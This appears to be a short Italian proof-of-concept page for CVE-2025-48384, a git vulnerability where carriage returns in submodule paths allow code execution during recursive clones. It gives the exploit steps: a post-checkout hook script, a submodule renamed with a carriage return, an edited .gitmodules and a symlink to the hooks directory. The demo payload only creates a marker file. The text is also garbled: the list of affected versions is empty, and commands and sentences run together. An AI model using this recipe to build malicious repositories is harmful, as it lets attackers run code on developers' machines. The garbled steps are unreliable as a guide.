
PoC per CVE-2025-48384
CVE-2025-48384 si configura come una vulnerabilità di risoluzione impropria dei link (link following) in git. In particolare, i nomi di file contenenti carriage return vengono analizzati in modo errato in .git/config, e l'inclusione di un symlink che punta a un eseguibile di hook git situato in un sottomodulo come directory degli hook del sottomodulo può portare all'esecuzione di codice arbitrario quando il repository viene clonato con git clone --recursive.
Git per Microsoft Windows non è interessato da questa vulnerabilità, lasciando principalmente vulnerabili versioni specifiche di git su Linux e macOS. Le versioni interessate sono:
post-checkout per eseguire codice quando il
repository poc viene clonato in modo ricorsivo:#!/bin/bash
touch ~/hackedlol
git submodule add https://github.com/<your submodule repo>.git subgit mv sub $(printf "sub\r")printf "\tpath = \"sub\r\"\n" in .gitmodules e rimuovi il percorso originale.ln -s .git/modules/sub/hooks sub